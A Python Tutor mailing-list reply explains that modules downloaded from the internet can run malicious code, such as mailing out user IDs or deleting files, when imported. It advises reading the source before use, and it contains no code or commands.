[Tutor] functions

[alan.gauld@bt.com]

> This seems important to understand in general too.  Is it 
> possible for someone to write a module and publish it 

Of course that's what's on Useless Python and the 
Vaults of Parnassus- lots of published modules that 
you can download.

> can come along, download it, and import it -- and then it 
> turns out that the module executes some malicious code 
> on their system?  

Absolutely, caveat emptor.
You should always check and understand modules that you 
download.

> would be wise to read the source of anything that you don't know for 
> sure about.  But if I invoked python (in Unix), wouldn't the Python 
> interpreter then inherit my own environment variables, 
> therefore being able to perform actions within my account 
> that otherwise it would not be able to do?  

No the interpreter remains exacrtly the same. But if the module
was malicious it could run under the interpreter and scrape of 
a list of valid user IDs for your system and mail them to 
somebody say.... or more directly just delete all the files on 
your disk!


> I am talking about a Trojan Horse.

No, nothing so subtle. Just malicious code that you naively 
downloaded and ran. Its no different to blindly downloading 
an EXE from a web site and running it - you just hope it 
does what it says on the label. The difference with Python 
modules is at least you can read the code!

Alan g.